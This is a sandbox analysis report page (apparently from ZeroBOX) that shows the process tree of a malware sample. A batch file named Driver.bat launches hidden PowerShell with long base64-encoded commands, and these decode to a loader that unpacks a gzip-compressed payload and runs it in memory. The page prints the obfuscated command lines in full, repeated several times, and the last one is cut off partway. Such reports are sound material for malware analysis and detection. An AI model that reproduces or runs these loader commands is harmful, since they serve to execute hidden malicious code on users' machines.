popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "svEmWqjLjtd" C:\Users\test22\AppData\Local\Temp\Driver.bat

    1492

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Driver.bat

      2144

      • cmd.exe C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEAQQBUAEsAWgAyAFEAQwBBADcAVgBXAGIAVwAvAGkATwBCAHsAMgB9ACsAdgB0AEwAKwBoADIAaQBGAGwARQBSAEwAUwBTAGoAcwBiAGwAdABwAHAAWABOAEMAQQA3AFMARgBBAGkAbgAnACcAKwAnACcAdgBpADAANQB1AFkAbwBJAFgASgA0AGIARQBsAE4ASwA5AC8AZQA4ADMAewAyAH0AawBsAGYAdABQAFMAdQBkADkASgBhAG8AbwAzAHQAbQBmAEgANABtAFcAZABtAFAATgA5AEUAbgBxAEEAOABVAGgANQB1AEUAMAB2ADUAOABmADYAZAAnACcAKwAnACcAawBvADAATwBqAG4ARwBvAGEASQBXADQAdgBMAHMAcwBLAG8AWABsAGUAcQB3AC8AYgBSAFoAVwBLAEgAUQBlAGwASwArAEsATgBrAFcAcgBWAFkAMgBIAG0ARQBhAHoAcwB6AE4ANwBFADgAYwBrAEUAdgB0ADUAcQBVADQARQBTAGgASQBTADMAagBKAEsARQBrADEAWAAvAGwASwBHAEMAeABLAFQAbwArAHYAYgA3ADgAUQBUAHsAMQB9AGcAKwBsADgARwBlAHAAegAnACcAKwAnACcAdgBnAHQAWgBwAG4AWQAnACcAKwAnACcAegBzAGIAZQBnAGkAaABIAEsAUABMAGwAMwBoAFgAMwBzAEgAUwB0ADUASwA0AFkARgBaAHIANgA3AFoAdQBxAFQANAAvAEsAcwA5AEwANQBlAG8ATgBaAG8AcQBuAHUATABoAEUAawBMAFAAbQBNAHEAYgByAHsAMQB9AFUANQBjAEgAMwB1AHgAVwBSAEYATgBiADEASQB0ADUAdwB1AGUAaQBOAEsAUgBSADUAYgBqAFUAagB4AEkAJwAnACsAJwAnADgASgAyADIAdwBkAGsAZABhAFIAQwB7ADEAfQA0AG4ANgBoAHcAbQA2AGYANwB4AEUAUgBzADQAaQBpADcAbAByAFMAegBsADkASgBVACsATwB6AEUAMwBFAE8AKwBIADUATQBrAFUAWQB2AEsAVgBKADQAdwBuAGMAMwArADAASwBiAFoAOABiADEATgBKAEcAaABJAFMAcwAxAEkAawBKAGkAdgBYAEIATABmAFUAWQA4AGsAcABRAGEATwBmAEUAWgA2AFoAewAyAH0ANAB7ADIAfQBMAFYAZgBFAE4AQQBwACcAJwArACcAJwBtAHUAZwA1AGkAZAAzAHgASgB0AEUASwAwAFkAYQB7ADEAfQBvAC8AQgBjAHoAVwBwAHQAcwBjAC8AewAyAH0AZQBxAHEAUQAnACcAKwAnACcAOQBWAHcASwBwAGoAbwBqADEASQBrAFQAMQAwAEUAVgBiADMATgA4AHcAcwBsAGQAVgB7ADIAfQAzAGkAYQBVAGsARwBIAGsAZABFAEIARQBQAHcAcABRAFoAegBuAEYATgBwACsAMgBWADAAZQBvAE4AewAyAH0AVABRAGoANgBtADYAUQA0AEIAbgA3AFUATwBUACcAJwArACcAJwAyAGkAcQAvAEYAVQB4AGkAMABvAEwAewAyAH0AcwBlAEMAeAB6AHUAWQBGAG0ANwBpAHsAMgB9AGQARgBuAGoANABnAHIAaABmAG0AdwArAEYAWgBiADUAVgB3AFIAMQBPADcAcgByAFQAVQBzAFQAUQBlAGMAKwByAE0AbgBBAHsAMQB9ADgASQBVAEMAQwA5AG4AcABSADUAbgBjADAAMQBNAHEAYwBSAHEAZQAwAGkASABGAEkAdgBKADYAeAAyAEsAQwBaAGsAegBrAGcASwBTAEMAawBYAGEANABPAHsAMgB9AG0AcABwAHQARQBMADkARwBHAEEAbQB3AGsAQwBCAEwAYQB2AHsAMQB9AGkAZABoADUAUwA4AGEAaAByAGIAUwBqAHoAUwBZAHcAJwAnACsAJwAnADgAaQBHAHMAQwBYAGsASABJADkAWgBmAE8ANwBPAE8AbQBxAGMAMgBvAFIAVQBMAEEAYgBqADgASAByAGgAYgBtAGsAQwBZAGsAbAA4ADUAUwBZADUAZQBmAEwAdQBjAGcAcABOAG8ATQBKADAAbABSADYAVwB3AGcAVAA3ADIAaQAnACcAKwAnACcANABoAEwATQBpAEYAOQBVAFUASgBUAFEAYgBBAHQAdABCACcAJwArACcAJwBFADgALwAxAFMAZAAzAFcAeABzAG0AcQBJACcAJwArACcAJwBjAFQAawBaAHUAYgA2AFMALwBSAHoARQA2ADEAZQBaAFMASQBlAE8ATgBCAFUAQQBHAEIARwAzAGQARgBQAEkAcQBaAEIASwBTAG8ATgBLAGgAUAByAEoAMQBMAGcALwB4ADAAOQBTAEEAYwBOAG0AWQBNAGsAZwBjAHMAMwAnACcAKwAnACcAVQBFADQAWQBFAFgAQwA0AEEAcABKAGwAZABpAFgAdAB4AHoAcQBKAFoAZQBJAFoAcgBoAGkASgBBAFMASgB0AEcAZwA0AHsAMgB9AEEAZABRAEkAcgBJAEUAUwBaAG0ARgBBACsASwByAGgANwAzAE0AcwAyAEIAUABlAFkAbABLAHsAMgB9AHMAYwB6AEgAewAxAH0ASABVAEwAdQBPAGkAcQBBAHgAbwBMAEsAQQBDAFMAWQBRAGwAdAAvADYASABDADcAOQBXAEgAdQBtAEwASABaAE0AcwBMAGwAcQBlAFcAMQBOAHIASgB7ADEAfQBUADUAQwAyAEoAOQBVAHgAbABKAGgAbQBiADQAcABHAGoARQBBAHAAQgB3AFkAaAA1AGEATwBDAEcAZgBxAC8AcwBpAG8AMwAwAHcAcgBtAGsASAB3AFIAagBYAEcAaQA0AGwAZwB7ADEAfQBVAHQATgA3AGYAJwAnACsAJwAnAHcAYQA4AEcAdgAzADUAcQBmAGQASQBUAEoAUQAxAHAAcAA4AHAAWgBuAEoANQAyADYAYwA0AEwAbwBOAHQAaAA2AEoAMgAzAGsAKwBSAGMAKwBPAFgAVgBCAHIAawB2AE4ANQBnAG4AewAxAH0ANwBhAHQAdQBnAHoAcABiAHgAegBkAHYAVQBLAE4ATAB7ADEAfQAwAEcAQQAvAHsAMgB9AGIAcwBCAGUATwBGAHgAOAB4AE8AcgBXAEcANAA0ADgAUwBrADIAOABaAFEAMgB0AHIAYgA4AEsAcgBWAHgAcwBoAEUAbABVAHIAMQB1AG0ASQB1AEEAYgAwAHgANgBDADEAQgBMADYAVABiACsAewAxAH0AdgA0AGgAbQBwADYAZgBXAFUAMQBFADgAdABzAHMAdgBNAEwAdQAzAGMANwBQAEgAWQBtAFEAOQBZAHcAcQBzADUAaQBQAHUAUwBKACsAMwBsAGMATQB3AHoAagAxAE0AZQAxADEAZwA0AGgAaQAvAHUAVgAxAG0ANQBVADcAdgBHAGIAaABoAGQAYQAxAFkAZwBiAHAAMwBaADEAaQBjADQAUgBzAHEAUAB6AGcAVwBQAHgAewAxAH0ANwBFAFYAbwA0ADQAeAB3AE0ARwBLAGIAMABlAGoATABxAHMASABOAHIASQArAFYAUwBtAFoAZABQAHUATwAxAGUAMAA2AEYAdQByAFgAJwAnACsAJwAnAHYANgA5AHIAcAAwAFoAZwBuAEEANQBIAGUARwBFAE4AQgA4AGQAMABzAGgAcgAxAEYAagBCADMAdABvADMAdQBwAFcARgBXAG0AegA1ADUANABKAE0AdABBAEYAZgBuAEMAQQBjADkAawBBAG4AcwBZADIAOAB4AEIANQBuAGEAUgAyAFIAOQBiAFAAUABrAEcAQwA4AHQAagBpAHsAMQB9AFEAYwBTAFoAcgBWAEYAKwBNAFYAMAA2AEgAdwBmADUATgAvADUAaQBqAEEAVwB1AFAATQBMAHEAYQA3AEIAegB7ADIAfQBLAEkAOAA3AFYAZABRAHcAKwBiAEEAZQBvAEMANgBJADQAOAB7ADIAfQBxAFkAcABUAGMAMQBSACcAJwArACcAJwA1AHEAUgBuAG4AZwBjADMALwA0AHEAVAAyAGUARwA0AE0AUgArADIATABVADcARwA1AG4ATQBaAEoAMwBOAGwAYQBoAC8ATAB0AHQAMQBDADYAOQBTAFgAbgByAFgAWAA4ADUAdQBSAHIAUwBRAGMAaABSADMAegBBAEcASAA0AEEAVgAwAHoANgBOAFIATwBWADQAVgBxAEEAVwBrAFQAWAB6AC8AYgB2AEMAKwBxAEgAeABqAEIAaQB2AHQAWQBRAFcAagBwAE0ARgBaAGsAQQBZAEsAUABWADUAMABqAG8AOABkAHIATABxADMAZQBGAFUAYQBtAGgAYQArAGgAQgBZAGsAagBnAGkAewAyAH0ARgBvAG4ATgBOAGUAYwA3ADQAZwB4ADcAcwBuAHUAawBkAFoANQA2AEYAegA3AGYAaQBMAGIAVwA3ACsAWgBPAG4AWABvAFMAMQBjAGUAQgBmAFcAbgBwAHAASQB2AG4AJwAnACsAJwAnAFoAMQBOAHcARQB2AEkAbwBKAFQAJwAnACsAJwAnAGYAcAAnACcAKwAnACcAUwBzAFMAQgBXAEoAUgBOAE8AOAByAHAAZwBuAHQAdwBMAHcAMwBxADIAbQAyAHYAUAAxAHsAMQB9AE4AbAAvAHQAdABMADIAMQBvAHUAdwBvAEUAcAAxAEgAOAB7ADEAfQB3ADEAewAyAH0AeABiAHAAWABOAEcAMAAzADQAOABZAFAAQgAwAEUARgBMAEgAWABNAFgAcwBOAFAAagBoADcAQwBXAFUASABpAHUAQwArAEcAawBnAFEATABjADcAWgBjAHcAagAzAE4AMwB2AGsAdwB3AHMAQQBBAGIAawB7ADEAfQBYAEgANABxAG4AdwAyAFMASwBXAHsAMgB9AGcAaQBLAHcAQgBCAHQAbABTAG4ANwBmAG8AQQByAGsAWQBrACsAdgBmAFMANQArAHMAcgBDADMAZwBuAC8AOQB2ADkASABsAGEAKwA0AGYAZABOADEASABLAEwASwBZAEEALwBiAEwANgBjAHUARgBaAE8ALwBpAE4AQwBBAHcAeABGAFMAewAnACcAKwAnACcAMgB9AHAAUQBuAFYAbQBaAFAAOQBhAE8AQQB4AEUAbABqAEwAUABnAHAAegBHAEIAeABKAGkAbgBnADMANQBqAEwANwBlAGkASwBNADIAUABNAHIAUwBIAHYARQAzAGoARwB2AHQAdwBjAEUATABBAEEAQQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAHkAJwAnACwAJwAnAEQAJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=

        2232

        • powershell.exe powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEAQQBUAEsAWgAyAFEAQwBBADcAVgBXAGIAVwAvAGkATwBCAHsAMgB9ACsAdgB0AEwAKwBoADIAaQBGAGwARQBSAEwAUwBTAGoAcwBiAGwAdABwAHAAWABOAEMAQQA3AFMARgBBAGkAbgAnACcAKwAnACcAdgBpADAANQB1AFkAbwBJAFgASgA0AGIARQBsAE4ASwA5AC8AZQA4ADMAewAyAH0AawBsAGYAdABQAFMAdQBkADkASgBhAG8AbwAzAHQAbQBmAEgANABtAFcAZABtAFAATgA5AEUAbgBxAEEAOABVAGgANQB1AEUAMAB2ADUAOABmADYAZAAnACcAKwAnACcAawBvADAATwBqAG4ARwBvAGEASQBXADQAdgBMAHMAcwBLAG8AWABsAGUAcQB3AC8AYgBSAFoAVwBLAEgAUQBlAGwASwArAEsATgBrAFcAcgBWAFkAMgBIAG0ARQBhAHoAcwB6AE4ANwBFADgAYwBrAEUAdgB0ADUAcQBVADQARQBTAGgASQBTADMAagBKAEsARQBrADEAWAAvAGwASwBHAEMAeABLAFQAbwArAHYAYgA3ADgAUQBUAHsAMQB9AGcAKwBsADgARwBlAHAAegAnACcAKwAnACcAdgBnAHQAWgBwAG4AWQAnACcAKwAnACcAegBzAGIAZQBnAGkAaABIAEsAUABMAGwAMwBoAFgAMwBzAEgAUwB0ADUASwA0AFkARgBaAHIANgA3AFoAdQBxAFQANAAvAEsAcwA5AEwANQBlAG8ATgBaAG8AcQBuAHUATABoAEUAawBMAFAAbQBNAHEAYgByAHsAMQB9AFUANQBjAEgAMwB1AHgAVwBSAEYATgBiADEASQB0ADUAdwB1AGUAaQBOAEsAUgBSADUAYgBqAFUAagB4AEkAJwAnACsAJwAnADgASgAyADIAdwBkAGsAZABhAFIAQwB7ADEAfQA0AG4ANgBoAHcAbQA2AGYANwB4AEUAUgBzADQAaQBpADcAbAByAFMAegBsADkASgBVACsATwB6AEUAMwBFAE8AKwBIADUATQBrAFUAWQB2AEsAVgBKADQAdwBuAGMAMwArADAASwBiAFoAOABiADEATgBKAEcAaABJAFMAcwAxAEkAawBKAGkAdgBYAEIATABmAFUAWQA4AGsAcABRAGEATwBmAEUAWgA2AFoAewAyAH0ANAB7ADIAfQBMAFYAZgBFAE4AQQBwACcAJwArACcAJwBtAHUAZwA1AGkAZAAzAHgASgB0AEUASwAwAFkAYQB7ADEAfQBvAC8AQgBjAHoAVwBwAHQAcwBjAC8AewAyAH0AZQBxAHEAUQAnACcAKwAnACcAOQBWAHcASwBwAGoAbwBqADEASQBrAFQAMQAwAEUAVgBiADMATgA4AHcAcwBsAGQAVgB7ADIAfQAzAGkAYQBVAGsARwBIAGsAZABFAEIARQBQAHcAcABRAFoAegBuAEYATgBwACsAMgBWADAAZQBvAE4AewAyAH0AVABRAGoANgBtADYAUQA0AEIAbgA3AFUATwBUACcAJwArACcAJwAyAGkAcQAvAEYAVQB4AGkAMABvAEwAewAyAH0AcwBlAEMAeAB6AHUAWQBGAG0ANwBpAHsAMgB9AGQARgBuAGoANABnAHIAaABmAG0AdwArAEYAWgBiADUAVgB3AFIAMQBPADcAcgByAFQAVQBzAFQAUQBlAGMAKwByAE0AbgBBAHsAMQB9ADgASQBVAEMAQwA5AG4AcABSADUAbgBjADAAMQBNAHEAYwBSAHEAZQAwAGkASABGAEkAdgBKADYAeAAyAEsAQwBaAGsAegBrAGcASwBTAEMAawBYAGEANABPAHsAMgB9AG0AcABwAHQARQBMADkARwBHAEEAbQB3AGsAQwBCAEwAYQB2AHsAMQB9AGkAZABoADUAUwA4AGEAaAByAGIAUwBqAHoAUwBZAHcAJwAnACsAJwAnADgAaQBHAHMAQwBYAGsASABJADkAWgBmAE8ANwBPAE8AbQBxAGMAMgBvAFIAVQBMAEEAYgBqADgASAByAGgAYgBtAGsAQwBZAGsAbAA4ADUAUwBZADUAZQBmAEwAdQBjAGcAcABOAG8ATQBKADAAbABSADYAVwB3AGcAVAA3ADIAaQAnACcAKwAnACcANABoAEwATQBpAEYAOQBVAFUASgBUAFEAYgBBAHQAdABCACcAJwArACcAJwBFADgALwAxAFMAZAAzAFcAeABzAG0AcQBJACcAJwArACcAJwBjAFQAawBaAHUAYgA2AFMALwBSAHoARQA2ADEAZQBaAFMASQBlAE8ATgBCAFUAQQBHAEIARwAzAGQARgBQAEkAcQBaAEIASwBTAG8ATgBLAGgAUAByAEoAMQBMAGcALwB4ADAAOQBTAEEAYwBOAG0AWQBNAGsAZwBjAHMAMwAnACcAKwAnACcAVQBFADQAWQBFAFgAQwA0AEEAcABKAGwAZABpAFgAdAB4AHoAcQBKAFoAZQBJAFoAcgBoAGkASgBBAFMASgB0AEcAZwA0AHsAMgB9AEEAZABRAEkAcgBJAEUAUwBaAG0ARgBBACsASwByAGgANwAzAE0AcwAyAEIAUABlAFkAbABLAHsAMgB9AHMAYwB6AEgAewAxAH0ASABVAEwAdQBPAGkAcQBBAHgAbwBMAEsAQQBDAFMAWQBRAGwAdAAvADYASABDADcAOQBXAEgAdQBtAEwASABaAE0AcwBMAGwAcQBlAFcAMQBOAHIASgB7ADEAfQBUADUAQwAyAEoAOQBVAHgAbABKAGgAbQBiADQAcABHAGoARQBBAHAAQgB3AFkAaAA1AGEATwBDAEcAZgBxAC8AcwBpAG8AMwAwAHcAcgBtAGsASAB3AFIAagBYAEcAaQA0AGwAZwB7ADEAfQBVAHQATgA3AGYAJwAnACsAJwAnAHcAYQA4AEcAdgAzADUAcQBmAGQASQBUAEoAUQAxAHAAcAA4AHAAWgBuAEoANQAyADYAYwA0AEwAbwBOAHQAaAA2AEoAMgAzAGsAKwBSAGMAKwBPAFgAVgBCAHIAawB2AE4ANQBnAG4AewAxAH0ANwBhAHQAdQBnAHoAcABiAHgAegBkAHYAVQBLAE4ATAB7ADEAfQAwAEcAQQAvAHsAMgB9AGIAcwBCAGUATwBGAHgAOAB4AE8AcgBXAEcANAA0ADgAUwBrADIAOABaAFEAMgB0AHIAYgA4AEsAcgBWAHgAcwBoAEUAbABVAHIAMQB1AG0ASQB1AEEAYgAwAHgANgBDADEAQgBMADYAVABiACsAewAxAH0AdgA0AGgAbQBwADYAZgBXAFUAMQBFADgAdABzAHMAdgBNAEwAdQAzAGMANwBQAEgAWQBtAFEAOQBZAHcAcQBzADUAaQBQAHUAUwBKACsAMwBsAGMATQB3AHoAagAxAE0AZQAxADEAZwA0AGgAaQAvAHUAVgAxAG0ANQBVADcAdgBHAGIAaABoAGQAYQAxAFkAZwBiAHAAMwBaADEAaQBjADQAUgBzAHEAUAB6AGcAVwBQAHgAewAxAH0ANwBFAFYAbwA0ADQAeAB3AE0ARwBLAGIAMABlAGoATABxAHMASABOAHIASQArAFYAUwBtAFoAZABQAHUATwAxAGUAMAA2AEYAdQByAFgAJwAnACsAJwAnAHYANgA5AHIAcAAwAFoAZwBuAEEANQBIAGUARwBFAE4AQgA4AGQAMABzAGgAcgAxAEYAagBCADMAdABvADMAdQBwAFcARgBXAG0AegA1ADUANABKAE0AdABBAEYAZgBuAEMAQQBjADkAawBBAG4AcwBZADIAOAB4AEIANQBuAGEAUgAyAFIAOQBiAFAAUABrAEcAQwA4AHQAagBpAHsAMQB9AFEAYwBTAFoAcgBWAEYAKwBNAFYAMAA2AEgAdwBmADUATgAvADUAaQBqAEEAVwB1AFAATQBMAHEAYQA3AEIAegB7ADIAfQBLAEkAOAA3AFYAZABRAHcAKwBiAEEAZQBvAEMANgBJADQAOAB7ADIAfQBxAFkAcABUAGMAMQBSACcAJwArACcAJwA1AHEAUgBuAG4AZwBjADMALwA0AHEAVAAyAGUARwA0AE0AUgArADIATABVADcARwA1AG4ATQBaAEoAMwBOAGwAYQBoAC8ATAB0AHQAMQBDADYAOQBTAFgAbgByAFgAWAA4ADUAdQBSAHIAUwBRAGMAaABSADMAegBBAEcASAA0AEEAVgAwAHoANgBOAFIATwBWADQAVgBxAEEAVwBrAFQAWAB6AC8AYgB2AEMAKwBxAEgAeABqAEIAaQB2AHQAWQBRAFcAagBwAE0ARgBaAGsAQQBZAEsAUABWADUAMABqAG8AOABkAHIATABxADMAZQBGAFUAYQBtAGgAYQArAGgAQgBZAGsAagBnAGkAewAyAH0ARgBvAG4ATgBOAGUAYwA3ADQAZwB4ADcAcwBuAHUAawBkAFoANQA2AEYAegA3AGYAaQBMAGIAVwA3ACsAWgBPAG4AWABvAFMAMQBjAGUAQgBmAFcAbgBwAHAASQB2AG4AJwAnACsAJwAnAFoAMQBOAHcARQB2AEkAbwBKAFQAJwAnACsAJwAnAGYAcAAnACcAKwAnACcAUwBzAFMAQgBXAEoAUgBOAE8AOAByAHAAZwBuAHQAdwBMAHcAMwBxADIAbQAyAHYAUAAxAHsAMQB9AE4AbAAvAHQAdABMADIAMQBvAHUAdwBvAEUAcAAxAEgAOAB7ADEAfQB3ADEAewAyAH0AeABiAHAAWABOAEcAMAAzADQAOABZAFAAQgAwAEUARgBMAEgAWABNAFgAcwBOAFAAagBoADcAQwBXAFUASABpAHUAQwArAEcAawBnAFEATABjADcAWgBjAHcAagAzAE4AMwB2AGsAdwB3AHMAQQBBAGIAawB7ADEAfQBYAEgANABxAG4AdwAyAFMASwBXAHsAMgB9AGcAaQBLAHcAQgBCAHQAbABTAG4ANwBmAG8AQQByAGsAWQBrACsAdgBmAFMANQArAHMAcgBDADMAZwBuAC8AOQB2ADkASABsAGEAKwA0AGYAZABOADEASABLAEwASwBZAEEALwBiAEwANgBjAHUARgBaAE8ALwBpAE4AQwBBAHcAeABGAFMAewAnACcAKwAnACcAMgB9AHAAUQBuAFYAbQBaAFAAOQBhAE8AQQB4AEUAbABqAEwAUABnAHAAegBHAEIAeABKAGkAbgBnADMANQBqAEwANwBlAGkASwBNADIAUABNAHIAUwBIAHYARQAzAGoARwB2AHQAdwBjAEUATABBAEEAQQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAHkAJwAnACwAJwAnAEQAJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=

          2300

          • powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAATKZ2QCA7VWbW/iOB{2}+vtL+h2iFlERLSSjsbltppXNCA7SFAin'+'vi05uYoIXJ4bElNK9/e83{2}klftPSud9Jaoo3tmfH4mWdmPN9EnqA8Uh5uE0v58f6d'+'ko0OjnGoaIW4vLssKoXleqw/bRZWKHQelK+KNkWrVY2HmEazszN7E8ckEvt5qU4EShIS3jJKEk1X/lKGCxKTo+vb78QT{1}g+l8Gepz'+'vgtZpnY'+'zsbegihHKPLl3hX3sHSt5K4YFZr67ZuqT4/Ks9L5eoNZoqnuLhEkLPmMqbr{1}U5cH3uxWRFNb1It5wueiNKRR5bjUjxI'+'8J22wdkdaRC{1}4n6hwm6f7xERs4ii7lrSzl9JU+OzE3EO+H5MkUYvKVJ4wnc3+0KbZ8b1NJGhISs1IkJivXBLfUY8kpQaOfEZ6Z{2}4{2}LVfENAp'+'mug5id3xJtEK0Ya{1}o/BczWptsc/{2}eqqQ'+'9VwKpjoj1IkT10EVb3N8wsldV{2}3iaUkGHkdEBEPwpQZznFNp+2V0eoN{2}TQj6m6Q4Bn7UOT'+'2iq/FUxi0oL{2}seCxzuYFm7i{2}dFnj4grhfmw+FZb5VwR1O7rrTUsTQec+rMnA{1}8IUCC9npR5nc01MqcRqe0iHFIvJ6x2KCZkzkgKSCkXa4O{2}mpptEL9GGAmwkCBLav{1}idh5S8ahrbSjzSYw'+'8iGsCXkHI9ZfO7OOmqc2oRULAbj8HrhbmkCYkl85SY5efLucgpNoMJ0lR6WwgT72i'+'4hLMiF9UUJTQbAttB'+'E8/1Sd3WxsmqI'+'cTkZub6S/RzE61eZSIeONBUAGBG3dFPIqZBKSoNKhPrJ1Lg/x09SAcNmYMkgcs3'+'UE4YEXC4ApJldiXtxzqJZeIZrhiJASJtGg4{2}AdQIrIESZmFA+Krh73Ms2BPeYlK{2}sczH{1}HULuOiqAxoLKACSYQlt/6HC79WHumLHZMsLlqeW1NrJ{1}T5C2J9UxlJhmb4pGjEApBwYh5aOCGfq/sio30wrmkHwRjXGi4lg{1}UtN7f'+'wa8Gv35qfdITJQ1pp8pZnJ526c4LoNth6J23k+Rc+OXVBrkvN5gn{1}7atugzpbxzdvUKNL{1}0GA/{2}bsBeOFx8xOrWG448Sk28ZQ2trb8KrVxshElUr1umIuAb0x6C1BL6Tb+{1}v4hmp6fWU1E8tssvMLu3c7PHYmQ9Ywqs5iPuSJ+3lcMwzj1Me11g4hi/uV1m5U7vGbhhda1Ygbp3Z1ic4RsqPzgWPx{1}7EVo44xwMGKb0ejLqsHNrI+VSmZdPuO1e06FurX'+'v69rp0ZgnA5HeGENB8d0shr1FjB3to3upWFWmz554JMtAFfnCAc9kAnsY28xB5naR2R9bPPkGC8tji{1}QcSZrVF+MV06Hwf5N/5ijAWuPMLqa7Bz{2}KI87VdQw+bAeoC6I48{2}qYpTc1R'+'5qRnngc3/4qT2eG4MR+2LU7G5nMZJ3Nlah/Ltt1C69SXnrXX8